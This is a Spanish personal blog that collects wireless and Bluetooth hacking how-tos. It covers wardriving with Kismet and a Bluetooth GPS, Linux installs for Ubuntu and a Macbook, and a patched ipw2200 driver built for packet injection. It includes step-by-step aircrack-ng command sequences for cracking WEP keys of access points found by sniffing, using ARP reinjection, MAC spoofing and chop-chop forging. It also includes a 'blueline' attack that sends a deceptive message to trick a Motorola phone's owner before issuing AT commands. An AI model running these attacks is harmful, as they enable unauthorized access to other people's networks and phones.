Wardriving con ipw2200 , mandriva y
dispositivo GPS bluetooth
Hola , aquí pretendo dejar plasmada la forma de hacer funcionar un dispositivo Gps bluetooth con kismet y gpsdrive sobre linux (mandriva 2006) ,espero que os sirva de ayuda o al menos de entretenimiento Tongue .
Bueno,al lio ..
Materiales utilizados:
laptop centrino,con ipw2200
mandriva 2006
dispositivo bluetooth
GPS bluetooth
Instaladas las sources de mandriva y editado /us/src/linux/makefile de esta manera u otra :
Código:
su
urpmi kernel-source
gedit /usr/src/linux/makefile
editamos la siguiente linea...
EXTRAVERSION = -12mdkcustom
el custom lo kitamos kedando asi:
EXTRAVERSION = -12mdk
Pasos a seguir..
(todo lo que se haga en terminal como root)
1º Hacer funcionar la ipw2200 en mandriva 2006,es facil solo hay que bajar el firmware y ponerlo en este directorio /lib/hotplug/firmware/ de esta manera:
lo bajais de aki http://ipw2200.sourceforge.net/firmware.php
recordad es la version 2.3 .
copiais el .tgz en /lib/hotplug/firmware/
abris una terminal :
Código:
cd /lib/hotplug/firmware/
tar -zxvf ipw2200-fw-2.3.tgz
despues solo teneis que ir al 'centro de control mandriva' y configurarla.
2º Tener instaladas las hcitools,eso con el cd/dvd de instalacion ..
Código:
urpmi libkdebluetooth
3º Necesitaremos tener instalado kismet :
Código:
wget http://www.kismetwireless.net/code/kismet-2006-04-R1.tar.gz
tar -zxvf kismet-2006-04-R1.tar.gz
cd kismet-2006-04-R1
./configure
make
make install
depues editamos kismet.conf de esta manera:
Código:
gedit /usr/local/etc/kismet.conf
buscais la linea
source=none,none,name
y lo cambiais por esto:
source=ipw2200,eth1,ipw2200
(en mi caso eth1 ,pero puede ser eth0)
eso con un iwconfig lo averiguais ..
Hecho esto, escribiendo 'kismet' como root en una terminal deberia de lanzarse el programa.
4º Necesitamos tambien el gpsdrive :
Código:
wget http://www.kraftvoll.at/software/gpsdrive-2.09.tar.gz
tar -zxvf gpsdrive-2.09.tar.gz
cd gpsdrive-2.09
./configure
make
make install
hecho esto,escribiendo 'gpsdrive' en la terminal deberia de lanzarse el gpsdrive.
Bueno ya esta todo instalado ,ahora que ? Tongue
Bien, insertamos nuestro dispositivo bluetooth en un puerto USB de nuestro laptop
y encendemos nuestro receptor GPS .
escribimos en la terminal:
Código:
hciconfig hci0 up
esto lebanta la interfase de bluetooth
Código:
hcitool scan
scanea dispositivos
saldra algo parecido a esto
Código:
Scanning ...
00:0x:7x:1x:D5:xx Woxter Slim BT Antenna D5FD
rfcomm bind /dev/rfcomm0 MA:C0:DI:SP:OS:IT:VO
enlazamos la recepcion GPS con el directorio /dev/rfcomm0 para ke pueda usar los datos otro/s programa/s
Código:
cat
vemos que hay flujo de datos
ctrl+z (para que paren de salir Tongue )
Para poder enviar los datos a la vez del GPS a gpsdrive y kismet tenemos ke usar la aplicación 'gpsd' este programa se encarga de leer los datos del archivo rfcomm0 y enviarlos por el puerto 2947 a las aplicaciones que requieran de esos datos.
Código:
gpsd -F /dev/rfcomm0
en back|track es -N
bien pues en principio ya esta todo ,lanzamos gpsdrive y despues kismet .
no olbidaros antes de lanzar kismet desactivar la ipw2200 si esta conectada en modo managed.
Código:
ifconfig eth1 down
kismet
de momento no he conseguido que gpsdrive me coloque los ap's en el mapa automaticamente ,si alguien sabe como ...molaria que lo explicara ..poderse ,se puede ...
de momento los coloco yo a mano ,solo hay que abrir el archivo .network que guarda kismet , y copiar y pegar lat y long ,añadiendo waypoints en el gpsdrive ,pulsando 'x' ..
el back|track tambien se configura asi .. exceptuando el detalle anterior ,aunque tampoco he conseguido que lo haga automaticamente.
Estoy en ello Tongue
unas imagenes ..
bueno espero ke al menos os halla entretenido todo este rollo ... Tongue
si hay alguna errata ..por favor comunicadmela ..
saludos
Datos personales
- Félix
- Elige la vida. Elige un empleo. Elige una carrera. Elige una familia. Elige un televisor grande que te cagas. Elige lavadoras, coches, equipos de compact-disk y abre latas electricos. Elige la salud, colesterol bajo y seguros dentales. Elige pagar hipotecas a interés fijo, Elige un piso piloto. Elige a tus amigos. Elige ropa deportiva y maletas a juego. Elige pagar a plazos un traje de marca en una amplia gama de putos tejidos. Elige el bricolaje y preguntarte quien coño eres los domingos por la mañana. Elige sentarte en el sofá a ver teleconcursos que embotan la mente y aplastan el espíritu, mientras llenas tu boca de puta comida basura. Elige pudrirte de viejo, cagandote y meandote encima en un asilo miserable, siendo una carga para los niñatos egoístas y hechos polvo, que has engendrado para reemplazarte. Elige tu futuro. Elige la vida. Pero por que iba yo a querer hacer algo así?? Yo elegí no elegir la vida, yo elegí otra cosa, ESCALAR!
jueves, 16 de agosto de 2007
HCItools Sdptools
hcitool
Hcitool es usado para configurar conexiones Bluetooth y enviar algúna orden especial a Dispositivos bluetooth. Basicamente en lo que a nosotros respecta , para ver lo que hay .. y los servicios de que disponen los dispositivos a nuestro alcance .
sdptool
Sdptool proporciona el interfaz para realizar preguntas de SDP* sobre dispositivos Bluetooth, y administracion sdpd local.
*El Protocolo de Descubrimiento de Servicios (Service Discovery Protocol o SDP) permite a las aplicaciones cliente descubrir la existencia de diversos servicios proporcionados por uno o varios servidores de aplicaciones, junto con los atributos y propiedades de los servicios que se ofrecen. Estos atributos de servicio incluyen el tipo o clase de servicio ofrecido y el mecanismo o la información necesaria para utilizar dichos servicios.
Ejemplo de uso :
Aqui podemos ver como usamos hcitool para conocer los dispositivos que se encuentran a nuestro alcance , y sdptool para conocer los servicios que tiene disponibles.
Hcitool es usado para configurar conexiones Bluetooth y enviar algúna orden especial a Dispositivos bluetooth. Basicamente en lo que a nosotros respecta , para ver lo que hay .. y los servicios de que disponen los dispositivos a nuestro alcance .
Código:
wifislax ~ # hcitool
hcitool - HCI Tool ver 3.5
Usage:
hcitool [options][command parameters]
Options:
--help Display help
-i dev HCI device
Commands:
dev Display local devices
inq Inquire remote devices
scan Scan for remote devices
name Get name from remote device
info Get information from remote device
spinq Start periodic inquiry
epinq Exit periodic inquiry
cmd Submit arbitrary HCI commands
con Display active connections
cc Create connection to remote device
dc Disconnect from remote device
sr Switch master/slave role
cpt Change connection packet type
rssi Display connection RSSI
lq Display link quality
tpl Display transmit power level
afh Display AFH channel map
lst Set/display link supervision timeout
auth Request authentication
enc Set connection encryption
key Change connection link key
clkoff Read clock offset
clock Read local or remote clock
For more information on the usage of each command use:
hcitool--help
sdptool
Sdptool proporciona el interfaz para realizar preguntas de SDP* sobre dispositivos Bluetooth, y administracion sdpd local.
Código:
wifislax ~ # sdptool
sdptool - SDP tool v3.5
Usage:
sdptool [options][command parameters]
Options:
-h Display help
-i Specify source interface
Commands:
search Search for a service
browse Browse all available services
records Request all records
add Add local service
del Delete local service
get Get local service
setattr Set/Add attribute to a SDP record
setseq Set/Add attribute sequence to a SDP record
Services:
DID SP DUN LAN FAX OPUSH FTP PRINT HS HF HFAG SAP NAP GN PANU
HCRP HID KEYB CIP CTP A2SRC A2SNK AVRCT AVRTG UDIUE UDITE SEMCHLA
SR1 SYNCML ACTIVESYNC HOTSYNC PALMOS NOKID PCSUITE NGAGE APPLE
ISYNC
*El Protocolo de Descubrimiento de Servicios (Service Discovery Protocol o SDP) permite a las aplicaciones cliente descubrir la existencia de diversos servicios proporcionados por uno o varios servidores de aplicaciones, junto con los atributos y propiedades de los servicios que se ofrecen. Estos atributos de servicio incluyen el tipo o clase de servicio ofrecido y el mecanismo o la información necesaria para utilizar dichos servicios.
Ejemplo de uso :
Aqui podemos ver como usamos hcitool para conocer los dispositivos que se encuentran a nuestro alcance , y sdptool para conocer los servicios que tiene disponibles.
Ataque blueline a motorola V3
Atake blueline en WiFiSlax 
Para instalar helomoto :
Para instalar uucp:
Unas capturas
Aunque ya esta linkado en el titulo , podeis ver la fuente aki ademas de una estupenda explicacion del bug por Gospel
Aqui configuramos el mensaje que enviara helomoto a el movil para engañar a su dueño y asi asociarse a el y lo enviamos con helomoto :
Aqui podemos ver el mensaje que aparece en el movil :
Despues solo queda bindear el rfcomm y lanzar los comandos AT ...
El resultado :
Lo siguiente bluezscanner .. que se instala perfectamente
saludos
Para instalar helomoto :
Código:
mkdir bluetooth
mkdir /bluetooth/helomoto
cd /bluetooth/helomoto
wget http://trifinite.org/Downloads/helomoto.tgz
tar zxvf helomoto.tgz
make
cp helomoto /usr/bin
Para instalar uucp:
Código:
cd bluetooth/
mkdir uucp
cd uucp/
wget http://freshmeat.net/redir/taylor-uucp/49721/url_tgz/uucp-1.07.tar.gz
tar zxvf uucp-1.07.tar.gz
./configure
make && make install
Unas capturas
Aunque ya esta linkado en el titulo , podeis ver la fuente aki ademas de una estupenda explicacion del bug por Gospel
Aqui configuramos el mensaje que enviara helomoto a el movil para engañar a su dueño y asi asociarse a el y lo enviamos con helomoto :
Aqui podemos ver el mensaje que aparece en el movil :
Despues solo queda bindear el rfcomm y lanzar los comandos AT ...
El resultado :
Lo siguiente bluezscanner .. que se instala perfectamente
saludos
Continuación
Instalacion de kismet en Ubuntu
Nos vamos a Synaptic y actualizamos estas librerias :
cerras y abris una terminal :
Código:
wget http://www.kismetwireless.net/code/kismet-2006-04-R1.tar.gz
tar zxvf kismet-2006-04-R1.tar.gz
cd kismet-2006-04-R1/
sudo ./configure
sudo make dep
sudo make
sudo make install
con eso ya esta instalado ,ahora hay que configurarlo :
en la terminal ...
Código:
sudo gedit /usr/local/etc/kismet.conf
en la linea
Código:
# User to setid to (should be your normal user)
suiduser=tu_user <------ en mi caso blunt
y poco mas abajo ..
para que funcione en modo monitor (habitual):
Citar
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=ipw2200,eth1,ipw2200
source=ipw2200,eth1,ipw2200
para que funcione en modo promiscuo (gracias a Fok) :
seria editar la misma linea ,pero de esta manera ...
Citar
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=ipwlivetap,eth1,ipw2200_rtap
source=ipwlivetap,eth1,ipw2200_rtap
mas aki : http://foro.elhacker.net/index.php/topic,139111.msg665116.html#msg665116
lo poneis segun esta .
ya lo siguiente es desde la terminal :
Código:
sudo kismet
espero que al menos esto os entretenga
si ves erratas ....
saludos
___________________________________________________________
Instalacion de Ethereal
[/size][/color]Continuamos instalando programas utilies para nuestros propositos , Ethereal es un programa basico para este tema y he decidido incluirlo en el manual , tiene bastantes dependencias para ser instalado en Ubuntu , pero en unos cuantos pasos lo tendremos corriendo en nuestro sistema ,a lio:
Abrimos el gestor de paquetes Synaptic y actualizamos las siguientes librerias de la misma forma que hicimos con kismet:
libpcap-dev
libpcre3-dev
libkrb53
libadns1-dev
libbeecrypt6-dev
libcurl3-gnutls-dev
Una vez hecho esto abrimos una terminal y nos dirigimos a nuestro directorio personal.Ahi ,podemos crear una carpeta llamada 'herramientas' por ejemplo (por tener las cosas ordenadas) y nos introducimos en ella :
Código:
cd /home/personal/
mkdir herramientas
cd /herramientas
bajamos la aplicacion:
Código:
wget http://www.ethereal.com/distribution/ethereal-0.99.0.tar.gz
y procedemos a instalar :
descomprimimos el tar ..
Código:
tar zxvf ethereal-0.99.0.tar.gz
entramos en el directorio creado...
Código:
cd ethereal-0.99.0/
instalamos..
Código:
sudo ./configure
sudo make
sudo make install
hecho esto ya lo tenemos listo para ejecutar ,desde la consola :
Código:
sudo ethereal
saludos
_____________________________________________________________________________________________
Dados los problemas que tienen 'algunos' en instalar las headers y build-essentials al carecer de internet en los primeros pasos de la instalacion , he decidido incluir su instalacion desde el cd de instalacion :
Instalacion de kernel-headers y build-essentials desde cd de instalacion
[/size][/color]para instalar las headers o build essentials NO hace falta tener inet , solo te hace falta el cd de instalacion , una vez arrancado el sistema , introduces el cd , y te aparecera esta imagen :
haces click en iniciar gestor de paketes ...
click en buscar :
buscas : headers
seleccionas las que correspondan a tu kernel , esto lo averiguas haciendo en la terminal :
Código:
uname -r
y aplicas los cambios ..
lo mismo con build-essentials ...
despues solo tienes que bajarte el driver de tu dispositivo e instalarlo .. con el tipico sudo make y sudo make install ... suponiendo que no te de errores y funcione en ubuntu ese driver ..
enlaces para no perder :
http://foro.elhacker.net/index.php/topic,139111.msg665648.html#msg665648
http://www.bluntmen.com/ipw2200-1.1.4-inject.patch
___________________________________________________________________
Extension de uso de la suite aircrack-ng con ipw2200
[/color][/size]Ataque con cliente conectado :
para sniffar en busca de redes :
Código:
sudo airodump-ng rtap0
una vez localizado , copiamos el BSSID del ap , la MAC del cliente (STATION) el canal y hacemos lo siguiente :
Código:
sudo airodump-ng -b bssid -c canal --ivs -w pruebas rtap0
reinyeccion de ARP's con cliente , en otra consola hacemos lo siguiente:
Código:
sudo aireplay-ng --ipwsys -3 -b bssid_ap -h mac_station -x 1024 -g 1000000 -i rtap0 eth1
una vez tengais mas de 500.000 datas (ivs) podeis ejecutar en otra consola :
Código:
sudo aircrack-ng *.ivs
o esto por poner una opcion bastante efectiva :
Código:
sudo aircrack-ng *.ivs -y
ya sabeis , un par de minutos , y si no suelta la clave ...mas ivs .
Ataque sin cliente asociado:
lo primero , cambiamos la MAC :
Código:
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:11:22:33:44:55
sudo ifconfig eth1 up
ahora sniffamos todos los canales en busca del ap a vulnerar:
Código:
sudo airodump-ng rtap0
copiamos la MAC del ap (BSSID) , y nos ponemos a sniffa esa MAC en el canal en el que se encuentra :
Código:
sudo airodump-ng -b bssid_ap -c canal --ivs -w pruebas rtap0
ahora en otra consola nos asociamos al ap :
Código:
sudo iwconfig eth1 essid "essid del ap" key FFFFFFFFFFFFFF
y lanzamos aireplay-ng con nuestra MAC :
Código:
sudo aireplay-ng --ipwsys -3 -b bssid_ap -h 00:11:22:33:44:55 -x 1024 -g 1000000 -i rtap0 eth1
y a esperar que caiga el ARP .. y empiecen a subir los data..
cuando haya suficientes data para lanzar el aircrack-ng , pues igual que en el anterior caso , en otra consola:
Código:
sudo aircrack-ng *.ivs
ó :
Código:
sudo aircrack-ng *.ivs -y
Ataque chop-chop sin cliente
citado textualmente del siguiente post de este hilo , explicado a la perfeccion por redkey :
http://foro.elhacker.net/index.php/topic,139111.msg689749.html#msg689749
Probado y funcionando , si bien hay que tener en cuenta las siguientes premisas apuntadas por thefkboss en este post :
http://foro.elhacker.net/index.php/topic,139111.msg690282.html#msg690282
ya que no todos los ap's tienen el mismo rango de ip's ..
Primero cambiamos la MAC de nuestro dispositivo:
Código:
fconfig eth1 up hw ether 00:11:22:33:44:55
ifconfig rtap0 up
Ahora nos ponemos a ver con quien probamos:
Código:
airodump-ng rtap0
Y una vez fjado el objetivo cancelamos y volvemos a lanzar:
Código:
airodump-ng -b <> -c < > -w captura rtap0
Ahora generamos el xor necesario. No pregunta si queremos utilizar el paquete y decimos que si.
Código:
aireplay-ng --ipwsys -4 -a <> -h 00:11:22:33:44:55 -i rtap0 eth1
En otra ventana nos asociamos al AP:
Código:
iwconfig eth1 essid <>
iwconfig eth1 key FFFF-FFFF
Generamos el paquete que vamos a reinyectar. Las ips son las que queramos.
Código:
arpforge-ng <> 1 < > 00:11:22:33:44:55 192.168.1.10 192.168.1.1 output.cap
Empezamos a meter el paquete generado:
Código:
aireplay-ng --ipwsys -2 -r output.cap eth1
Y Para finalizar el ataque 3:
Código:
aireplay-ng --ipwsys -3 -b <> -h 00:11:22:33:44:55 -x 100 -i rtap0 eth1
saludos
Continuación
segun dejamos el sistema ,esta preparao para compilar etc .. pero si no quereis comeros el tarro bajando programas .. existe la utilidad Automatix .
Automatix es una utilidad que ayuda a instalar los programas de uso habituales en la navegacion normal .. amule ,amsn,antivirus,java.flash ,codec de video ,utilidades para escritorio ... incluso las utilidades de aceleracion grafica tipo xgl y compiz ..
extraido del wiki de Automatix
http://getautomatix.com/wiki/index.php?title=Installation
copio y pego lo que debeis poner vosotros (recordemos que es una guia para conocimientos nulos )
se necesita estar conectado a internet
primero editamos una linea en sources.list :
copiamos y pegamos la siguiente linea al final de el archivo sources.list:
cierras el archivo y guardas los cambios
ahora haces los siguientes ordenes en la terminal :
para acabar instalamos Automatix :
ahora podeis encontrar la opcion en :
Aplicaciones >> herramientas del sistema>> Automatix
es un script , cuando lo ejecuteis os cargara un menu ,con las aplicaciones disponibles para instalar , solo teneis que seleccionar las que querais .. he ir aceptando .. cuando os pida el passw lo poneis ..
es una herramienta estupenda en media hora tienes un sistema preparado para cualkier eventualidad .
espero os sea de ayuda tb ..
saludos
Automatix es una utilidad que ayuda a instalar los programas de uso habituales en la navegacion normal .. amule ,amsn,antivirus,java.flash ,codec de video ,utilidades para escritorio ... incluso las utilidades de aceleracion grafica tipo xgl y compiz ..
extraido del wiki de Automatix
http://getautomatix.com/wiki/index.php?title=Installation
copio y pego lo que debeis poner vosotros (recordemos que es una guia para conocimientos nulos )
se necesita estar conectado a internet
primero editamos una linea en sources.list :
Código:
sudo gedit /etc/apt/sources.list
copiamos y pegamos la siguiente linea al final de el archivo sources.list:
Código:
deb http://www.getautomatix.com/apt dapper main
cierras el archivo y guardas los cambios
ahora haces los siguientes ordenes en la terminal :
Código:
wget http://www.getautomatix.com/apt/key.gpg.asc
gpg --import key.gpg.asc
gpg --export --armor 521A9C7C | sudo apt-key add -
para acabar instalamos Automatix :
Código:
sudo apt-get update
sudo apt-get install automatix2
ahora podeis encontrar la opcion en :
Aplicaciones >> herramientas del sistema>> Automatix
es un script , cuando lo ejecuteis os cargara un menu ,con las aplicaciones disponibles para instalar , solo teneis que seleccionar las que querais .. he ir aceptando .. cuando os pida el passw lo poneis ..
es una herramienta estupenda en media hora tienes un sistema preparado para cualkier eventualidad .
espero os sea de ayuda tb ..
saludos
Continuación
Bueno , lo siguiente es preparar el sistema para poder compilar
Manos a la obra :
contexto: http://foro.elhacker.net/index.php/topic,138168.msg649129.html#msg649129
Abrimos una terminal ,instalamos las headers de nuestro kernel de este modo:
debemos estar conectados a inet
creamos un enlace simbolico a usr/src/linux :
bajamos los paketes que nos haran falta :
Primero creamos una carpeta llamada por ejemplo wifi en el directorio personal que tengais y desde la terminal entramos en ella :
Ok ,ya tenemos todo colocado , ahora a instalar todo por orden :
$ tar zxvf ieee80211-1.2.15.tgz
$ cd ieee80211-1.2.15
$ sudo make
'y' en todas las preguntas
$ sudo make install
$ cd ..
$ tar zxvf ipw2200-1.1.4.tgz
$ patch -p0 < ipw2200-1.1.4-inject.patch
$ cd ipw2200-1.1.4
$ sudo ./remove-old
'y' a todo
$ sudo make
$ sudo make install
$ cd ..
$ tar zxvf aircrack-ng.06-M-F-by-thefkboss.tar.gz
$ cd aircrack-ng-0.6
$ sudo make
$ sudo make install
bueno ,ahora yo reiniciaria .. pero en principio ya esta todo instalao
para cargar el modulo ..
aporte de Fok
Si no quereis cargar el modulo para inyeccion cada vez que querais inyectar con vuestra ipw2200 , solo teneis que seguir los siguientes pasos :
editais las opciones de modprobe.d de este modo:
añadis al final del archivo lo siguiente :
con esto cada vez que arranqueis vuestro sistema se cargara automaticamente la interfaz rtap0 .
muchas gracias por el aporte Fok
mas aki : http://foro.elhacker.net/index.php/topic,139111.msg664713.html#msg664713
Para usar con aircrack ..
Unas capturas :
el interfaz rtap0
snifando con rtap0
inyectando con eth1
podeis averiguar mas aki :
http://tinyshell.be/aircrackng/forum/
agradecer a logger02 sus esfuerzos por llevar esto adelante ...
todo en estos hilos ..
http://foro.elhacker.net/index.php/topic,138168.0.html
http://foro.elhacker.net/index.php/topic,138583.0.html
para preguntas al autor de el patch ..
http://foro.elhacker.net/index.php/topic,138168.msg648750.html#msg648750
Os ruego me comuniquies las erratas que veais
saludos
Manos a la obra :
"Secuencia de pasos para que todo salga bien sin pringarse las manos"
[/color][/b]contexto: http://foro.elhacker.net/index.php/topic,138168.msg649129.html#msg649129
Abrimos una terminal ,instalamos las headers de nuestro kernel de este modo:
debemos estar conectados a inet
Código:
$ sudo apt-get install linux-headers-`uname -r` build-essential
creamos un enlace simbolico a usr/src/linux :
Código:
$ sudo ln -s /usr/src/linux-`uname -r` /usr/src/linux
bajamos los paketes que nos haran falta :
Primero creamos una carpeta llamada por ejemplo wifi en el directorio personal que tengais y desde la terminal entramos en ella :
Código:
$ cd /home/personal/wifi
$ wget http://superb-east.dl.sourceforge.net/sourceforge/ieee80211/ieee80211-1.2.15.tgz
$ wget http://www.bluntmen.com/aircrack-ng.06-M-F-by-thefkboss.tar.gz
$ wget http://jaist.dl.sourceforge.net/sourceforge/ipw2200/ipw2200-1.1.4.tgz
$ wget http://tv.latinsud.com/ipw2200/ipw2200-1.1.4-inject.patch
Ok ,ya tenemos todo colocado , ahora a instalar todo por orden :
Citar
$ tar zxvf ieee80211-1.2.15.tgz
$ cd ieee80211-1.2.15
$ sudo make
'y' en todas las preguntas
$ sudo make install
$ cd ..
$ tar zxvf ipw2200-1.1.4.tgz
$ patch -p0 < ipw2200-1.1.4-inject.patch
$ cd ipw2200-1.1.4
$ sudo ./remove-old
'y' a todo
$ sudo make
$ sudo make install
$ cd ..
$ tar zxvf aircrack-ng.06-M-F-by-thefkboss.tar.gz
$ cd aircrack-ng-0.6
$ sudo make
$ sudo make install
bueno ,ahora yo reiniciaria .. pero en principio ya esta todo instalao
para cargar el modulo ..
Código:
$ cd ipw2200-1.1.4
$ sudo rmmod ipw2200
$ sudo insmod ipw2200.ko rtap_iface=1
$ sudo ifconfig eth1 up
$ sudo ifconfig rtap0 up
aporte de Fok
Si no quereis cargar el modulo para inyeccion cada vez que querais inyectar con vuestra ipw2200 , solo teneis que seguir los siguientes pasos :
editais las opciones de modprobe.d de este modo:
Código:
sudo gedit /etc/modprobe.d/options
añadis al final del archivo lo siguiente :
Código:
# IPW2200
options ipw2200 rtap_iface=1
con esto cada vez que arranqueis vuestro sistema se cargara automaticamente la interfaz rtap0 .
muchas gracias por el aporte Fok
mas aki : http://foro.elhacker.net/index.php/topic,139111.msg664713.html#msg664713Para usar con aircrack ..
Código:
$ sudo airodump-ngrtap0
$ sudo aireplay-ng --ipwsys-i rtap0 eth1
Unas capturas :
el interfaz rtap0
snifando con rtap0
inyectando con eth1
podeis averiguar mas aki :
http://tinyshell.be/aircrackng/forum/
agradecer a logger02 sus esfuerzos por llevar esto adelante ...
todo en estos hilos ..
http://foro.elhacker.net/index.php/topic,138168.0.html
http://foro.elhacker.net/index.php/topic,138583.0.html
para preguntas al autor de el patch ..
http://foro.elhacker.net/index.php/topic,138168.msg648750.html#msg648750
Os ruego me comuniquies las erratas que veais
saludos
Instalación de Ubuntu (Preparandonos para inyectar con ipw2200 )
Manual de instalacion ubuntu para centrinos
preparandonos para inyectar con ipw2200
Prologo.preparandonos para inyectar con ipw2200
Este manual esta indicado para usuarios a los que les da 'miedo' instalar Linux junto con windows . Para el principiante en Linux es algo bastante importante poder tener el 'parapeto' de windows por si las cosas salen mal .. con Ubuntu Dapper 'no problem'.
También lo considero algo de lo que poder tirar cuando yo mismo tenga problemas o lagunas mentales, cosa que desafortunadamente me suele pasar
.Quiero agradecer el trabajo de logger02 por los retoques efectuados a el driver y parche ,despues de muchas pruebas hemos podido compilar el driver y patch original ,pero sin el esto solo seria una guia de instalacion de Ubuntu .
Por ultimo saludar y agradecer a la gente anónima (y no tan anónima) que día a día hace que el foro de elhacker.net sea un referente en lo que se refiere a seguridad informática .
AVISO : No me responsabilizo de los posibles daños en hardware que pueda ocasionar un mal entendimiento de este manual . alla cada cual ...
ACTUALIZACION
Este Manual , es tambien valido para la nueva versión ubuntu edgy 6.10 y kubuntu edgy 6.10 , la instalación es practicamente la misma, solo difiere algo en las versiones de kubuntu dado su entorno grafico que es pòr defecto KDE, y la herramienta de particionado , que es QTparted . Manos a la obra.
El equipo utilizado para este manual consta de :
1.Portátil IBM thinkpad R52 (cnetrino)
2.Tarjeta inalámbrica PCI ipw2200 B/G
3.Disco duro SCSI de 40 gigas
4.Windows XP profesional instalado .
5.Mandriva instalado en partición extendida ( no influye para nada en la instalación)
6.Paciencia y muchas ganas .
Preámbulo
Primero necesitamos bajar desde windows el cd de instalación de Ubuntu desde aquí :
http://ftp.ubuntu-es.org/releases/6.06/ubuntu-6.06.1-desktop-i386.iso
Una vez descargado , lo quemamos en un cd y arrancamos nuestro Portátil con el cd en el lector de cd , si no arranca desde cd , deberemos habilitar esa opción en la BIOS .
Una vez arrancado configuramos la conexión a internet de esta manera :
Según arrancas Ubuntu .. si tu red no esta abierta (open) ,tienes dos formas de configurar la conexión ,la forma gráfica , y desde la terminal ..
La forma gráfica ..
click con el botón derecho en el icono de la red .. (las dos pantallitas ,rollo windos ) en el menú contextual seleccionas propiedades , en la ventana que aparece , pones el pasw .. en la siguiente seleccionas configurar .. en la siguiente ventana pones tus datos de conexión (essid ,key ) y aceptas ..
ya deberías de estar conectado .. si tu conexión tiene activado DHCP lo dejas según esta .. si no .. pues pones las ip's ..
Desde terminal ...
Código:
sudo iwconfig eth1 essid "tu essid" key
sudo ifconfig eth1 192.168.x.33 broadcast 192.168.x.250 netmask 255.255.255.0
sudo route add default gw 192.168.x.1
sudo echo "nameserver 80.58.0.33" > /etc/resolv.conf
sudo echo "nameserver 80.58.32.93" >> /etc/resolv.conf
1.Hacemos doble click sobre el icono de instalación que hay en el escritorio de Ubuntu y aparecerá la siguiente pantalla :
Seleccionamos el idioma de la instalación .
2.Seleccionamos la franja horaria
3.Selecionamos la disposicion de nuestro teclado.
4.Rellenamos los datos de user y password y continuamos .
5.Empezamos a particionar , nos hacen falta un mínimo de 3 gigas en una partición primaria con sistema de archivos ext3 para la instalación y una partición swap de al menos la mitad de la memoria ram que tengamos (la mía es de un giga) .
Si no teneis el disco duro particionado , solo tendreis que redimensionar la partición de windows con la utilidad gparted que usa el instalador kitandole por ejemplo un 10% de su tamaño y configurar ese espacio como dige anteriormente .
5.Comprobamos que todo esta en su sitio , y seguimos con la instalación.
Iremos viendo el progreso de la instalación ,sin tener que actuar mas ..
GRUB reconoce sin problemas windows y otros sistemas operativos instalados en tu makina .
Cuando acabe aparecerá esta ventana ,reiniciamos ....
una vez reiniciemos , ya tendremos nuestro Ubuntu Dapper corriendo desde HD .. ahorasolo queda prepararlo para poder instalar el driver parcheado para inyeccion .. el siguiente post..
espero que os sirva de algo esta pequeña guia de instalacion , al menos fijo que os habra tenido entretenidos un rato
Os ruego me comuniquies las erratas que veais
saludos
Instalación de GNU/Linux en Macbook (Para auditoria inalambrica)
Buenas , debido a la relativamente poca información clara y en castellano que he encontrado buscando por inet , he decidido hacer este pequeño how-to sobre la instalación de Linux en un macbook con la intención de utilizar su airport extreme (atheros) para la auditoría inalámbrica.
Además de que este dispositivo con macintosh me daba problemas para conectarse a mi ap cosa que con Linux no ocurre.
Podría haber intentado el hacking wireless con mac ... pero me gusta mas linux
Empecemos ..
La víctima:
Lo primero es actualizar mac .
Boot Camp necesita que tengas Mac OS X v.10.4.6. (o posterior) y la última versión de firmware instalada en tu ordenador. en todo caso cuando arranques el Asistente de Boot Camp, te dirá si necesitas actualizar tu firmware o software del sistema.
Para actualizar el software del sistema de tu ordenador
1) Del menú Apple, elige Actualización de Software
2) Si aparece alguna actualización para Mac OS X, selecciónala.
3) Haz clic en Instalar.
Para instalar el firmware de tu ordenador
1) Vé a: www.apple.com/support/downloads/
2) Busca la actualización de firmware de tu ordenador. Por ejemplo, busca "Mac mini firmware update".
3) Descarga el paquete de actualización del firmware
4) Abre el paquete y sigue las instrucciones que aparecerán en la pantalla.
A continuación particionamos el disco duro del mac , para esto nos bajamos boot camp de aquí:
http://www.apple.com/es/macosx/bootcamp/
Lo instalamos y particionamos , es muy sencillo , solo hay que dejar el espacio suficiente para que entre un sistema Linux y su swap , con 4 gigas vamos bien.
Esto nos sirve únicamente para poder utilizar parte de el disco duro de nuestro mac , ya que durante la instalación de Linux tendremos que formatear esa parte de disco en las dos particiones necesarias para nuestra instalación y nuestro mac seguirá pensando que es con Guindos con quien comparte disco...
Seguidamente instalamos refit, es un gestor de arranque para mac, el cual podemos descargar de aquí:
http://refit.sourceforge.net/
http://prdownloads.sourceforge.net/refit/rEFIt-0.9.dmg?download
Instalación de Linux
Una vez particionado el disco e instalado el gestor solo nos resta instalar Linux , yo he instalado Ubuntu 7.04 , el cual podeis bajar de aquí :
http://www.ubuntu.com/getubuntu/download
Para arrancar un live cd en Mac, introducimos el cd , reiniciamos y presionamos durante el arranque la tecla 'C' .
La instalación , incluida la partición de la porción de disco que hemos quitado a Macintosh es practica mente idéntica a la de este hilo :
http://foro.elhacker.net/index.php/topic,139111.0.html
Solo que hay que reparticionar la partición que dejamos para Guindos con boot camp.
Necesitamos una partición de al menos 3 gigas en ext3 a la cual hay que asignar la raiz '/' y otra swap de al menos nuestra RAM .
Esta es mi tabla de particiones:
Os recomiendo que durante la instalación estéis conectados a inet por cable.
Una vez instalado Linux , reiniciamos tal y como nos dice el instalador , al reiniciar aparecerá el gestor de arranque refit con este aspecto :
Por supuesto elegimos Linux para el arranque y nos preparamos para actualizar el sistema e instalar el driver para nuestra Airport .
Abrimos una shell y tecleamos lo siguiente como root :
Seguidamente:
Instalamos los driver:
Instalamos aircrack-ng:
Para poner el dispositivo en modo monitor :
Link's interesantes:
http://www.faq-mac.com/mt/archives/016727.php
http://hwagm.elhacker.net/drivers-ng/driver-ng.htm
Espero que os sea de utilidad
Además de que este dispositivo con macintosh me daba problemas para conectarse a mi ap cosa que con Linux no ocurre.
Podría haber intentado el hacking wireless con mac ... pero me gusta mas linux
Empecemos ..
La víctima:
Lo primero es actualizar mac .
Boot Camp necesita que tengas Mac OS X v.10.4.6. (o posterior) y la última versión de firmware instalada en tu ordenador. en todo caso cuando arranques el Asistente de Boot Camp, te dirá si necesitas actualizar tu firmware o software del sistema.
Para actualizar el software del sistema de tu ordenador
1) Del menú Apple, elige Actualización de Software
3) Haz clic en Instalar.
Para instalar el firmware de tu ordenador
1) Vé a: www.apple.com/support/downloads/
